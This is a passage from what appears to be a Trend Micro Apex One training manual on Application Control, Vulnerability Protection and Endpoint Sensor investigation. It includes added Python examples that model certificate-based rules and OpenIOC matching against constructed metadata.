• Program file folders: Only applies to applications in the path specified and stored in the
Program Files folders (default folders C:\Program Files and C:\Program Files
(x86))
• System volume: Only applies to applications in the path specified and stored in the default
Windows system drive

File paths can include regular expressions and wildcards.

Digital Certificates
Applications typically include a digital signature for file integrity purposes. The digital signature
includes the digital certificate of the issuer and contains details such as the issuer name and validity
details.


You can configure Application Control to specifically target applications based on the trust level of a
certificate and on specific certificate attributes. Select the type of certificate trust level and
then specify the required certificate Issuer or Subject information. These certificate properties can
be retrieved from the Certificate Details.

The trust level combinations for Allow and Block criteria using Certificates differ.

Allow Criteria
• Trusted (valid): You have included the certificate in the trusted certificates list and the
certificate must not have expired
• Trusted (expired): You have added the certificate in the trusted certificates list but the
certificate has already expired
• Untrusted: The certificate is unknown or you did not add the certificate to the trusted
certificates list

Block Criteria
• Untrusted: The certificate is unknown or you did not add the certificate to the trusted
certificates list
• Untrusted/Trusted (expired): The certificate is unknown, or you have added the certificate to
the trusted certificates list but the certificate has already expired
• Untrusted/Trusted (valid or expired): The certificate is unknown, or you have added the
certificate to the trusted certificates list and it is either still valid or has already expired


The certificate properties required can be retrieved from the Windows Certificate Details window.
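The Allow and Block trust-level combinations listed above, modelled as an added example that is not Trend Micro code. A signing certificate is classified as trusted-valid, trusted-expired or untrusted from the administrator's trusted list and its validity period, and a criterion then checks that class plus an optional Issuer or Subject match. The Certificate shape, the trusted list keyed by thumbprint, the fixed date used as "now" and all sample values are assumptions:

```python
"""Added example (not Trend Micro code): evaluating certificate-based Allow and
Block criteria by trust level, as listed in the lesson.

The Certificate shape, a trusted list keyed by thumbprint, the fixed 'today'
and the sample values are assumptions for illustration."""
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class Certificate:
    thumbprint: str
    issuer: str
    subject: str
    not_after: date   # end of the validity period


# Trust classes covered by each selectable level, as listed for Allow and Block criteria.
ALLOW_LEVELS = {
    "Trusted (valid)": {"trusted_valid"},
    "Trusted (expired)": {"trusted_expired"},
    "Untrusted": {"untrusted"},
}
BLOCK_LEVELS = {
    "Untrusted": {"untrusted"},
    "Untrusted/Trusted (expired)": {"untrusted", "trusted_expired"},
    "Untrusted/Trusted (valid or expired)": {"untrusted", "trusted_expired", "trusted_valid"},
}


def classify(cert, trusted_thumbprints, today):
    """'untrusted' unless the thumbprint is on the trusted list; then valid or expired by date."""
    if cert.thumbprint.upper() not in {t.upper() for t in trusted_thumbprints}:
        return "untrusted"
    return "trusted_valid" if cert.not_after >= today else "trusted_expired"


def criterion_matches(action, trust_level, cert, trusted_thumbprints, today, issuer=None, subject=None):
    """True if a certificate criterion of the given action and trust level applies to cert."""
    levels = ALLOW_LEVELS if action == "Allow" else BLOCK_LEVELS
    if trust_level not in levels:
        raise ValueError("%r is not a selectable %s trust level" % (trust_level, action))
    if classify(cert, trusted_thumbprints, today) not in levels[trust_level]:
        return False
    if issuer is not None and cert.issuer != issuer:
        return False
    if subject is not None and cert.subject != subject:
        return False
    return True


# Constructed sample data.
TRUSTED = ["AA11", "BB22"]   # thumbprints the administrator added to the trusted list
TODAY = date(2019, 7, 29)    # fixed 'now' so the example is reproducible
CERTS = {
    "vendor_current": Certificate("AA11", "CN=Example CA", "CN=Example Vendor", date(2020, 12, 31)),
    "vendor_old": Certificate("BB22", "CN=Example CA", "CN=Example Vendor", date(2018, 1, 1)),
    "unknown": Certificate("FF99", "CN=Other CA", "CN=Unknown Publisher", date(2021, 1, 1)),
}


def demo():
    """Per certificate: (Allow 'Trusted (valid)' with the vendor Subject, Block 'Untrusted/Trusted (expired)')."""
    return {
        name: (
            criterion_matches("Allow", "Trusted (valid)", cert, TRUSTED, TODAY, subject="CN=Example Vendor"),
            criterion_matches("Block", "Untrusted/Trusted (expired)", cert, TRUSTED, TODAY),
        )
        for name, cert in CERTS.items()
    }


if __name__ == "__main__":
    for name, (allowed, blocked) in demo().items():
        print(name, "allow-match" if allowed else "-", "block-match" if blocked else "-")
```

Note that the example classifies only signed files; an unsigned application has no certificate to evaluate, which is one reason the lesson's Pros and Cons table warns that not all software carries a digital signature.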


Certified Safe Software List


The Trend Micro Certified Safe Software List is a list of known applications that includes popular
operating system files, binary files, and applications for desktops, servers and mobile devices. This list
is categorized according to the application's features and can be searched by Vendor or Application
name. Administrators can select from these categories to create a rule. Trend Micro periodically
provides updates to the list through the Certified Safe Software Pattern.

To search for a vendor name, select Vendors and type the name of the vendor in the search field.
To search for an application name, select Applications and type the name of the application in the
search field.

The Trend Micro Certified Safe Software pattern requires an update when being used for the first
time. A manual update can be performed through the Web Management console.

You can search for applications by typing the name of Vendors or Applications. Select applications
using the data provided.
• Application: The name of the application
• AIR Score: A comprehensive security score based on an application's popularity and
reputation
• Global Usage: The global prevalence of the application. Click the prevalence to view a
regional breakdown of the application usage.


Gray Software List


The Gray Software List contains applications that may be malicious if not used properly. Trend Micro
recommends blocking or monitoring applications in the Gray Software List to ensure that your
network remains secure.

Once the Certified Safe Software List pattern is downloaded, it will automatically create a default rule
called Default Criteria - Assess Gray Software List Applications. This criteria type cannot be deleted.
It is configured by default in Block (Assessment) mode, which means that even if the application is
executed on the endpoint it will not be blocked, but a detection log will be generated.


Click the Default Criteria - Assess Gray Software List Applications criteria to view the items on the
list.

Implementing Application Control


Application Control policies are deployed through Apex Central. The steps involved in implementing
Application Control protection on endpoint computers involve the following:
1 Defining the Application Control Criteria
2 Creating the policy including Application Control protection
3 Specifying the Security Agents that will be implementing the policy
4 Deploying the policy

Defining the Application Control Criteria


In Apex Central, click Policies > Application Control Criteria. A single default criteria is
displayed. The Assess Gray Software List Applications criteria is displayed by default when the
Certified Safe Software List Pattern is downloaded. This ensures that the applications on this list are
blocked by default.


Click Add Criteria and select the option to Allow or Block the defined applications.

Use the following attributes to define the applications to Allow or Block.


• File Hash
• File Path
• Certificate
• Certified Software Pattern

Creating the Policy


In the Apex One Web Management console, click Policy > Policy Management. In the Product list,
select Apex One Security Agent and click Create or Create one now to define a new policy.


Expand the Application Control Settings section and click to enable Application Control.

Click the All user accounts rule. The Application Control Criteria are displayed in the Available
criteria column.


Click each required criteria one at a time and click the arrow button to move it into the Selected
criteria column, then click OK.


Specifying the Security Agents That Will be Implementing the Policy
In the Targets section of the policy, use Filter by Criteria or Specify Target(s) to identify which
Security Agents will be implementing the Application Control policy.


Deploy the policy


Once the targets and policy settings have been defined, scroll down to the bottom of the list and
click Deploy.

The policy will be listed as Pending while it awaits deployment to the target endpoint Security
Agents.

Once applied to the target endpoints, the policy will display with a status of Deployed.


User-based Application Control


User-based Application Control is available if you have integrated Active Directory. If you do not have
Active Directory integration, you can only assign rules to the default All user accounts rule.

You can only assign 30 users or groups per rule. Create additional rules if you need to assign a greater
number of users to a policy.

User Accounts: Specify the Active Directory user accounts or groups to which you want to assign the
specific Application Control criteria.

Criteria: Move the necessary criteria from the Available list to the Selected list.


Best Practices for Enabling Application Control


The following are some recommended best practices when configuring Application Control in Apex One.

Use Learn → Monitor → Refine


1 An Application Control Block criteria with the match method set to Gray Software List is created
by default. Enable all categories in this list and enable assessment mode. Violations are logged,
but the applications are not yet blocked.
2 Monitor the Application Monitoring violations manually, using the Top Blocked Applications
widget or by running a Log Query.
3 Refine the criteria and approve recognized software by unselecting categories from the Gray
Software list and creating Allow criteria to exempt them from screening.

Use Lockdown
Lockdown is suitable for organizations which do not have frequent software changes or those who
want to limit user access to certain applications only. Recommended practices include:
• Create an Allow rule for Windows Update when enabling this setting
• Create a Golden Image of the endpoint after all applications have been installed or updated
before enabling this setting.
• Deploy this setting gradually on a few endpoints before fully implementing the lockdown to a
larger group.
• Enabling Exclude applications by Trend Micro trusted vendors is highly recommended in
lockdown scenarios.

In-house Applications
In-house applications should be added to Allow rules using Hash Values as the Application Control
criteria.

Top Blocked Applications Widget


To fine-tune Application Control policies, enable the Top Blocked Applications Dashboard Widget. This
widget helps administrators identify applications that are commonly blocked in their network.

Trust Permissions
Consider the following before changing the Allow trust permissions to Applications can execute
other processes or Inheritable execution rights (not recommended).
• Apply these permissions only to specific applications that require them, to avoid granting
extended rights to other applications that do not need them.
• Never use these permissions on web client applications like Internet Explorer, Chrome or
Firefox to avoid exposing the endpoint to Drive-by Download exploits.
• These permissions are not recommended for File Path Allow rules as the specified folder
location may be granting extended execute rights to unintended applications.

Application Control Criteria Pros and Cons

Certified Safe Software List
• Pro: Categorizing by features; less decision making required
• Con: Requires some time to monitor the detection log to see which software are actually the
ones to allow or block
• Best Practice: Learn → Monitor → Refine

Gray Software
• Pro: Pre-filtered list; less decision making required
• Con: Requires some time to monitor the detection log to see which software are actually the
ones to allow or block
• Best Practice: Learn → Monitor → Refine

File Hash
• Pro: Direct criteria to allow or block the specific file
• Con: Software might have different versions and/or different platforms; regular maintenance
required
• Best Practice: Allow or block the specific application directly

File Path
• Pro: Direct criteria to allow or block the files under a certain path
• Con: Any files under that path will follow the criteria; if a software places files into
multiple folders, it needs some configuration
• Best Practice: Apply it with other big-scope allow/block criteria

Certificate
• Pro: Easily allow or block all the files of a company by using its digital signature
• Con: All of the products by that company will apply the criteria, no middle ground; not all
software has a digital signature
• Best Practice: Apply to trustworthy or bad-reputation companies


Lesson 17: Protecting Endpoint Computers From Vulnerabilities

Lesson Objectives:

After completing this lesson, participants will be able to:


• Create policies implementing Vulnerability Protection on Windows endpoint computers

Intrusion Prevention (IPS) functionality in Apex One protects Windows endpoint computers from being
exploited through operating system vulnerability attacks. It automates the application of virtual patches
to the endpoint computers, which remain in place until an official patch for the operating system
vulnerability becomes available.

Note: Vulnerability Protection in Apex One is available for Windows endpoint computers only.

Integrated Vulnerability Protection NEW

Intrusion Prevention (IPS) functionality is integrated into Apex One through Vulnerability Protection. A
separate Vulnerability Protection Agent and Server are no longer needed to provide Vulnerability
Protection capabilities.

If the separate Agent is in use for an existing OfficeScan XG installation, it will be automatically
uninstalled when Vulnerability Protection policies are deployed and a new Apex One service will be
launched to integrate Vulnerability Protection.

Policies using Apex One Application Control must be deployed through Apex Central.

To streamline assignment of Intrusion Prevention rules, Vulnerability Protection in Apex One operates in
one of two priority modes:
• Performance priority: Performance priority uses a subset of Intrusion Prevention Rules to
conserve network resources. These are the rules recommended to be applied when Agent
performance is of high importance.
• Security priority: Security priority uses the full set of Intrusion Prevention Rules but requires
additional network resources. These rules provide complete protection and this mode is
designed for users with higher security awareness.


Note: Recommendation Scans are no longer used with Vulnerability Protection. Instead, Intrusion
Prevention Rules are derived from the priority mode assigned and are based on Trend Micro’s
analysis of operating system vulnerabilities.

Vulnerability Protection Pattern


The Vulnerability Protection Pattern used by Apex One contains the Intrusion Prevention Rules
recommended by Trend Micro, based on in-depth analysis of operating system vulnerabilities. This
pattern is released weekly or more often depending on the urgency of some vulnerabilities. Intrusion
Prevention Rules deployed to the Security Agents through the pattern will examine the actual content
and sequences of network packets. Based on the conditions set within the Rule, various actions are then
carried out on these packets, including dropping the packets or resetting the connection.

When the Vulnerability Protection Pattern is downloaded to the Apex One Server, the pattern is saved
and decoded. The decoded rules are displayed in the list of Intrusion Prevention Rules. Each rule includes
information such as Name, Application Type, Severity and CVE. Search can be used to filter this list.


Vulnerability Protection Rules


After enabling Vulnerability Protection for a domain, select the required priority mode and the rules
used by that mode are displayed.

Note: The list of rules used in a particular priority mode is not configurable; the rules are assigned to
the mode by Trend Micro engineers.

Displayed columns include:


• Identifier: This column displays a unique numeric code assigned to the rule by Trend Micro.
• Name: This column displays a short description of the rule, for naming purposes.
• Application Type: This column identifies the operating system component that requires the
rule.
• Severity: This column displays one of four possible rule severity levels: Low, Medium, High,
or Critical.
• Mode: Intrusion Prevention rules can operate in either Prevent or Detect modes. Detect
mode rules generate log entries when triggered, but do not drop the packets or reset the
connection. Prevent mode rules will enforce the action assigned to them.
• Type: This column identifies the type of rule, whether Exploit, Vulnerability or Smart. Exploit
rules are used to protect against specific exploits in a one-to-one relationship. Vulnerability
rules protect against multiple exploits and Smart rules protect against multiple
vulnerabilities.
• CVE: This column lists the globally unique Common Vulnerabilities and Exposures (CVE) identifier.
• Microsoft: This column lists the Microsoft Common Vulnerabilities and Exposures (CVE)
identifier.
• CVSS Score: This column displays the Common Vulnerability Scoring System score which
can then be translated into a qualitative representation (such as low, medium, high, and
critical) to help organizations properly assess and prioritize their vulnerability management
processes. CVSS is a published standard used by organizations worldwide.
• Last Updated: This column displays the date when the rule was last updated.

Columns can be sorted by clicking the column header. The list of rules can also be searched by
typing a string in the Search box at the top of the list.

Implementing Vulnerability Protection


Vulnerability Protection policies are deployed through Apex Central. The steps involved in implementing
Vulnerability Protection on endpoint computers include the following:
1 Creating the policy including Application Control protection
2 Specifying the Security Agents that will be implementing the policy
3 Deploying the policy

Creating the Policy


In the Apex One Web Management console, click Policy > Policy Management. In the Product list,
select Apex One Security Agent and click Create or Create one now to define a new policy.


Expand the Vulnerability Protection Settings section and click to enable a Priority Mode of either
Performance priority or Security priority.

Specifying the Security Agents That Will be Implementing the Policy
In the Targets section of the policy, use Filter by Criteria or Specify Target(s) to identify which
Security Agents will be implementing the Application Control policy.


Deploy the policy


Once the targets and policy settings have been defined, scroll down to the bottom of the list and
click Deploy.

The policy will be listed as Pending while it awaits deployment to the target endpoint Security
Agents.

Once applied to the target endpoints, the policy will display with a status of Deployed.


Network Engine Settings


The Network Engine Settings tab allows the selection of the Network Engine detection mode. There are
two possible modes:
• Inline: In Inline mode, live packet streams pass directly through the Vulnerability Protection
network engine. All rules are applied to the network traffic before the packets proceed up the
protocol stack.
• Tap (Detect-only): In Tap mode, live packet streams are replicated and diverted from the main
stream. This mode is handy for evaluating the behavior of the rules as log entries will be
generated without applying the rule action.

This tab also enables the configuration of timeouts and other options.

• ESTABLISHED Timeout: How long to stay in the ESTABLISHED state before closing the
connection.
• LAST_ACK Timeout: How long to stay in the LAST-ACK state before closing the connection.
• Cold Start Timeout: Amount of time to allow non-SYN packets that could belong to a connection
that was established before the stateful mechanism was started.
• UDP Timeout: Maximum duration of a UDP connection.
• Maximum TCP Connections: Maximum simultaneous TCP Connections.
• Maximum UDP Connections: Maximum simultaneous UDP Connections.
• Ignore Status Code: This option lets you ignore certain types of Events. You can specify up to
three Events to ignore.
• Advanced Logging Policy: Select from the following settings:
- Bypass: No filtering of Events. Overrides the Ignore Status Code settings (above) and other
advanced settings, but does not override logging settings defined on the Apex One server.
- Default: Will switch to Tap Mode if the engine is in Tap Mode, and will switch to Normal if the
engine is in Inline Mode.
- Normal: All Events are logged except dropped retransmits.
- Backwards Compatibility Mode: For support use only.
- Verbose Mode: Same as Normal but including dropped retransmits.
- Stateful and Normalization Suppression: Ignores dropped retransmit, out of connection,
invalid flags, invalid sequence, invalid ack, unsolicited udp, unsolicited ICMP, out of allowed
policy.
- Stateful, Normalization, and Frag Suppression: Ignores everything that Stateful and
Normalization Suppression ignores as well as events related to fragmentation.
- Stateful, Frag, and Verifier Suppression: Ignores everything Stateful, Normalization, and
Frag Suppression ignores as well as verifier-related events.
- Tap Mode: Ignores dropped retransmit, out of connection, invalid flags, invalid sequence,
invalid ack, max ack retransmit, packet on closed connection.

Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers

Lesson Objectives:

After completing this lesson, participants will be able to:


• Create policies using Endpoint Sensor
• Define the phases in the Incident Response Model
• Perform a preliminary assessment using Endpoint Sensor recorded data
• Generate a root cause analysis
• Respond to security incidents
• Perform a detailed investigation

Apex One includes tools for detecting and investigating suspicious activities on endpoint computers.
These capabilities allow threat investigators to explore detections and hunt for new threats using
Endpoint Detection and Response (EDR). Endpoint Detection and Response uses advanced detection and
response techniques integrated into the Security Agents on the endpoint computers to automate the
identification and containment of advanced threats.

In addition to Endpoint Detection and Response, Trend Micro has introduced a Managed Detection and
Response (MDR) service, where trained analysts in Trend Micro Security Operations Centers (SOC) can
assist organizations that do not have incident response staff to complete a detailed investigation of
threats and provide the steps needed to deal with these threats.

Trend Micro Endpoint Sensor plays a vital role in preventing, monitoring and containing the extent of
damage caused by targeted attacks on endpoints and servers.

Integrated Endpoint Sensor NEW

Trend Micro Endpoint Sensor identifies affected endpoints through on-demand investigations and
monitoring of threats, providing analysts with a comprehensive set of threat details that can help them
respond effectively to attacks. Endpoint Sensor plays an important role in the solution against advanced
persistent threats.

Separate Endpoint Sensor Agents and Servers are no longer needed to provide Endpoint Detection and
Response capabilities in Apex One. If the separate Agent is in use for an existing OfficeScan XG
installation, it will be automatically uninstalled when Apex One policies using Endpoint Sensor are
deployed and a new Apex One service will be launched to integrate Endpoint Sensor.

Note: Endpoint Sensor is not supported on Windows Server platforms.

On the endpoint, the Apex One Security Agent records vectors commonly associated with targeted
attacks, such as file executions, memory violations, registry changes, and more in the form of metadata.
Endpoint Sensor utilizes the data during a preliminary investigation to identify affected endpoints. The
Agent creates a database of all the files, activities, and important system resources, and continuously
updates this database to record the arrival and execution of suspicious objects. This data is forwarded to
Apex One Server on a regular basis.

The type of metadata collected depends on the operating system installed on the endpoint.

Metadata collected from Windows endpoints includes:


• Host (name / IP address)
• User account
• File name
• File path
• Hash values (SHA-1, SHA-256 and MD5)
• Registry key
• Registry data
• Registry name
• Command line

Metadata collected from macOS endpoints includes:


• Host (name / IP address)
• User account
• File name
• File path
• Hash values (SHA-1, SHA-256 and MD5)
• Command line

Policies using Endpoint Sensor must be deployed through Apex Central. Endpoint Sensor capabilities are
built into the Apex One Server and Security Agent; however, an additional license is required to
activate them.

Trend Micro Endpoint Sensor provides the following capabilities to assist in the investigation and
mitigation of advanced threats:
• Threat Investigation: Endpoint Sensor provides a central location to investigate threats on
multiple endpoints. Endpoint Sensor can investigate both the historical and current state of all
managed endpoints. Each investigation can display a graphical breakdown of the threat
activities, which allows administrators to re-construct the events related to the security incident
from start to end.
If regular monitoring is part of the organization's security plan, Endpoint Sensor provides the
option to schedule investigations at specified intervals.
• Customized Endpoint Investigation: Endpoint Sensor supports Indicators of Compromise (IOC)
and YARA rules which allow the creation, sharing and re-use of existing threat information. IOC
and YARA rules are fully customizable to address targeted attacks. Additionally, Endpoint
Sensor also provides its own set of IOC rules, which are regularly updated to provide protection
from the most recent threats.
• Remote Endpoint Management: Endpoint Sensor allows administrators to monitor, manage and
run investigations on endpoints through the Apex Central Web-based management console. The
Web Management console provides a means to configure the endpoint policies remotely, and
view endpoint details, such as agent version, pattern version, and so forth, all from a central
location.
• Attack Discovery: Endpoint Sensor can proactively monitor and discover suspicious files and
behavior through user-defined IOC rules. Endpoint Sensor also leverages Trend Micro's threat
intelligence through the use of regularly updated IOC rules to provide protection from the latest
threats.
• File Collection and Analysis: Endpoint Sensor collects all files that match a monitoring rule. Once
a suspicious file is found, it can be sent to a local file server, or sent to a Deep Discovery
Analyzer device for further analysis. Deep Discovery Analyzer then provides Endpoint Sensor
with a comprehensive set of threat details that can help administrators determine if a file is
malicious or not.

Note: Endpoint Sensor requires the use of the full version of Microsoft SQL Server 2016 (not SQL
Express) with the Full-Text and Semantic Extractions for Search feature enabled.

Enabling Endpoint Sensor


When enabled, Endpoint Sensor monitors the endpoint computer and forwards metadata to the
Apex One server. Policies using Endpoint Sensor must be deployed from Apex Central.

In addition to enabling Endpoint Sensor, the option to enable Attack Discovery is available. Attack
Discovery uses Trend Micro threat intelligence based on Indicators of Attack behavior. After detecting
a known Indicator of Attack, Attack Discovery logs the detection.

Endpoint Detection and Response


Endpoint Detection and Response is a solution that allows administrators to continuously monitor
endpoints and record activities that could be considered suspicious. This centrally stored data can then
be searched for suspicious and malicious activities by a threat analyst.

The goals of the Endpoint Detection and Response system include:


• Detecting security incidents that may have been missed by other detection methods
• Containing the incident at the endpoint
• Providing guidance for further investigation of security events
• Providing remediation guidance

The key value of Endpoint Detection and Response solutions is detecting threats that have evaded other
protection technologies.

Endpoint Detection and Response assists the analyst in their investigation by providing three primary
functions:
• Recording and storing endpoint system-level behaviors. In Apex One, this function is provided by
Endpoint Sensor, which is now integrated into the Security Agent.
• Detecting or flagging suspicious system behaviors from recorded data using various data
analytics techniques. In Apex One, this functionality is provided through Apex Central.
• Providing remediation suggestions to the analysts on how best to respond to the security
incident.

Based on the analysis of the collected data, the analyst can quickly answer some of the most common
questions when systems are breached, such as:
• What is the extent of the breach?
• How did the breach happen?
• What did the hacker or malware do while it was active?
• How do we confidently restore the system so that all traces of the malware are removed?
• Was this a random attack, was it targeted, and what were the attackers' goals?
• How do we prevent it from happening again?

Apex One Incident Response Model


The Apex One incident response model includes five distinct phases to deal with security incidents.
These phases include:
• Quick Health Check: This phase provides a Preliminary Assessment.
• Drill Down Events: This phase provides a Root Cause Analysis for the security incident.
• Stop the Bleed: This phase provides Incident Responses to prevent further infection.
• Dig Further: To better understand the impact of the security incident, this phase performs a live
Detailed Investigation of the endpoint. This phase does not rely on Endpoint Sensor recorded
metadata.
• Incident Auto-Detect: This phase provides Attack Discovery based on rules generated from
previously encountered incidents.

[Figure: the five phases shown as a cycle: Quick Health Check, Drill Down Events, Stop the Bleed,
Dig Further, Incident Auto-Detect]

Preliminary Assessment
A preliminary assessment is a quick search of objects that is run against historical metadata recorded by
Endpoint Sensor and stored on the Apex One Server. Since this task is not executed on the endpoints
themselves, it provides visibility of the whole environment, even when some endpoints are offline.

Preliminary assessments aim to shorten the waiting time while performing an investigation. The average
assessment scan takes between 5 to 10 seconds. The Apex One Security Agent can upload metadata to
the Apex One Server every 3, 6, 12 or 24 hours. Once uploaded, Apex Central will perform a quick
scan against the Server database directly. The metadata retention period is based on the storage add-on
license purchased. By default, metadata is stored for 30 days, but a license for 90, 180 or 365 days can
be purchased.

Since preliminary assessment scans are performed against metadata, they do not provide a real-time
view of the endpoint. This is by design, as it allows a fast response to a query.

Preliminary assessments can be performed from a few different locations in Apex Central.

Preliminary Investigation
In Apex Central, click Response > Preliminary Investigation.

Preliminary investigations in Apex One will help administrators evaluate impact scope through
custom criteria defined by the administrator or OpenIOC.

Note: The data available during Preliminary investigations is a subset of Security Agent data and only
includes information about high risk file types. If an assessment returns no results, you may
want to perform a detailed investigation.

Custom criteria

An assessment using custom criteria can determine the existence of a threat using simple
criteria, such as a user account, file name or registry value. An administrator can specify or load up
to ten user-defined criteria.

OpenIOC File

An OpenIOC file is an XML file which contains one or more Indicators of Compromise (IOCs).
Administrators can use OpenIOC rules to define investigation criteria. Preliminary investigations
disregard all conditions and match any of the indicators specified in the OpenIOC file. A
preliminary assessment can be performed when an analyst receives an indicator of compromise
which is compared against the metadata stored on the Apex One Server to see if the
environment is compromised.

OpenIOC files can be provided by Trend Micro through Apex Central (click Use Existing OpenIOC
File) or acquired from other sources and imported (Upload OpenIOC File).

Select the OpenIOC file and click Apply.

Using OpenIOC files in preliminary investigations has the following limitations:


• Only one OpenIOC file can be loaded at a time.
• Any operator specified in the OpenIOC file is changed to OR.
• The only supported condition is IS. Entries using other conditions are ignored and marked
with a strikethrough.
• The only supported indicators are the indicators that are applicable to the collected
metadata. Entries using unsupported indicators are ignored and marked with a
strikethrough.
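The reduction a preliminary investigation applies to custom criteria (up to ten, matched as IS) and to an OpenIOC file (operators forced to OR, only IS conditions kept, only indicators present in the collected metadata kept), modelled as an added Python example that is not Apex One code. The mapping of OpenIOC search terms to metadata fields, case-insensitive comparison, and the sample records and IOC file are assumptions made for this example.

```python
"""Added example, not Apex One code: how a preliminary investigation reduces custom criteria
and an OpenIOC file before matching them against stored metadata. Assumptions not from the
lesson: the OpenIOC search term for each field, case-insensitive matching, the sample data."""
import xml.etree.ElementTree as ET

# Metadata fields the Windows Security Agent records (listed in the lesson), keyed by the
# OpenIOC search term assumed to address each one (compared lower-cased).
SEARCH_TERM_TO_FIELD = {
    "fileitem/filename": "file_name", "fileitem/filepath": "file_path",
    "fileitem/md5sum": "md5", "fileitem/sha1sum": "sha1", "fileitem/sha256sum": "sha256",
    "registryitem/keypath": "registry_key", "registryitem/valuename": "registry_name",
    "registryitem/value": "registry_data", "processitem/arguments": "command_line",
    "systeminfoitem/username": "user_account",
}
COLLECTED_FIELDS = set(SEARCH_TERM_TO_FIELD.values()) | {"host"}
MAX_CUSTOM_CRITERIA = 10  # an administrator can specify or load up to ten criteria

def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]

def load_openioc_for_preliminary(xml_text):
    """Reduce an OpenIOC 1.0 document to what a preliminary investigation uses.
    Every IndicatorItem becomes a (field, value) criterion OR'ed with the others, whatever
    operator the enclosing Indicator elements carry. Items whose condition is not 'is', or
    whose indicator is not part of the collected metadata, are returned in 'ignored' (the
    console shows those with a strikethrough). Returns (criteria, ignored)."""
    criteria, ignored = [], []
    for item in ET.fromstring(xml_text).iter():
        if _local(item.tag) != "IndicatorItem":
            continue
        parts = {_local(child.tag): child for child in item}
        context, content = parts.get("Context"), parts.get("Content")
        term = (context.get("search", "") if context is not None else "").lower()
        value = (content.text or "").strip() if content is not None else ""
        condition = item.get("condition", "").lower()
        field = SEARCH_TERM_TO_FIELD.get(term)
        if condition != "is" or field is None:
            ignored.append((term, condition, value))
            continue
        criteria.append((field, value))
    return criteria, ignored

def custom_criteria(pairs):
    """Criteria as an administrator enters them by hand: up to ten (field, value) pairs
    over the collected metadata fields; each is an exact-match (IS) criterion."""
    if len(pairs) > MAX_CUSTOM_CRITERIA:
        raise ValueError(f"at most {MAX_CUSTOM_CRITERIA} user-defined criteria")
    unknown = [field for field, _ in pairs if field not in COLLECTED_FIELDS]
    if unknown:
        raise ValueError(f"not a collected metadata field: {unknown}")
    return list(pairs)

def assess(criteria, records):
    """Match criteria against stored metadata records with OR semantics: a host is
    affected if any of its records matches any single criterion. Returns sorted hosts."""
    hits = set()
    for rec in records:
        if any(rec.get(field, "").lower() == value.lower() for field, value in criteria):
            hits.add(rec["host"])
    return sorted(hits)

# Constructed sample metadata, shaped like what the Security Agent uploads to the server.
SAMPLE_SHA1 = "0123456789abcdef0123456789abcdef01234567"  # constructed, not a real hash
SAMPLE_METADATA = [
    {"host": "WKS-01", "user_account": "alice", "file_name": "update.exe", "sha1": SAMPLE_SHA1,
     "file_path": r"C:\Users\alice\AppData\Local\Temp", "command_line": "update.exe /silent"},
    {"host": "WKS-02", "user_account": "bob", "file_name": "notepad.exe", "sha1": "b" * 40,
     "file_path": r"C:\Windows\System32", "command_line": "notepad.exe"},
    {"host": "WKS-03", "user_account": "carol", "registry_name": "Updater",
     "registry_key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "registry_data": r"C:\Users\carol\AppData\Local\Temp\update.exe"},
]

# Constructed OpenIOC file: an AND group holding a 'contains' item and an indicator (file
# size) the Security Agent does not collect; the assessment strikes both through.
SAMPLE_OPENIOC = f"""<ioc xmlns="http://schemas.mandiant.com/2010/ioc" id="constructed-example">
  <definition>
    <Indicator operator="AND" id="i1">
      <IndicatorItem id="a" condition="is">
        <Context document="FileItem" search="FileItem/Sha1sum" type="mir"/><Content type="sha1">{SAMPLE_SHA1}</Content>
      </IndicatorItem>
      <IndicatorItem id="b" condition="contains">
        <Context document="FileItem" search="FileItem/FileName" type="mir"/><Content type="string">update</Content>
      </IndicatorItem>
      <IndicatorItem id="c" condition="is">
        <Context document="RegistryItem" search="RegistryItem/ValueName" type="mir"/><Content type="string">Updater</Content>
      </IndicatorItem>
      <IndicatorItem id="d" condition="is">
        <Context document="FileItem" search="FileItem/SizeInBytes" type="mir"/><Content type="int">12345</Content>
      </IndicatorItem>
    </Indicator>
  </definition>
</ioc>"""

if __name__ == "__main__":
    kept, struck = load_openioc_for_preliminary(SAMPLE_OPENIOC)
    print(assess(kept, SAMPLE_METADATA), [term for term, _, _ in struck])
```

Because the AND group is flattened to OR, the sample matches two hosts even though no single record satisfies every item, which is exactly why a preliminary hit is a lead for root cause analysis rather than a verdict.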

Custom Intelligence
Preliminary assessment can also be used to sweep the environment for objects that have not yet
been identified by Apex One as malicious. Suspicious objects defined in Custom Intelligence can be
used as the basis of the sweep. These objects can come from a variety of sources. Security Agents can
be configured to automatically flag the defined objects when they enter the environment. Once the
types of objects have been defined by importing or adding the appropriate files, click Analyze
Impact.

In Apex Central, click Threat Intel > Custom Intelligence.

User-Defined Suspicious Objects

You can protect your network from objects not yet identified on your network by adding the
suspicious objects to the User-Defined Suspicious Object list. Apex Central provides the option
to add objects based on the file, file SHA-1, domain, IP address, or URL. You can also specify the
scan action that supported Trend Micro products perform after detecting the suspicious objects.

Click Threat Intel > Custom Intelligence and click the User-Defined Suspicious Objects tab.

Click Add to create your own custom list of user-defined suspicious objects, or click Import to
load a *.csv file containing the details.

Click to select the User-Defined Suspicious Object from the list and click Analyze Impact.

It will take a few moments while the scan is performed.

Structured Threat Information Expression

Structured Threat Information Expression (STIX) is a structured language for describing cyber
threat information so it can be shared, stored, and analyzed in a consistent manner.

After obtaining a properly formatted Structured Threat Information Expression (STIX) file
(*.xml) from a trusted external source (such as a security forum or another Deep Discovery Virtual
Analyzer product), import the file to Apex Central to extract the suspicious file SHA-1, IP address,
URL, and domain objects to the User-Defined Suspicious Object list. When uploading a file, you
can also specify the scan action that supported Trend Micro products perform after detecting
the suspicious objects.

Click Threat Intel > Custom Intelligence and click the STIX tab. Click Add to select the file to load.

Locate the STIX file and select the action to be performed on detected objects.

OpenIOC

You can protect your environment from objects not yet identified on your network by importing
properly formatted OpenIOC files (*.ioc) and extracting suspicious file SHA-1, IP address, URL,
and domain objects to the User-Defined Suspicious Object list. When uploading a file, you can
specify the scan action that supported Trend Micro products perform after detecting the
suspicious objects. After uploading an OpenIOC file, you can also select an uploaded file as the
assessment criteria for a Preliminary or Detailed Investigation.

Click Add to import an OpenIOC file, and select the scan action to perform on detected objects.

Click to select the OpenIOC object from the list and click Analyze Impact.

Virtual Analyzer Suspicious Object


This assessment method leverages Suspicious Objects generated by Cloud Sandbox or Deep Discovery
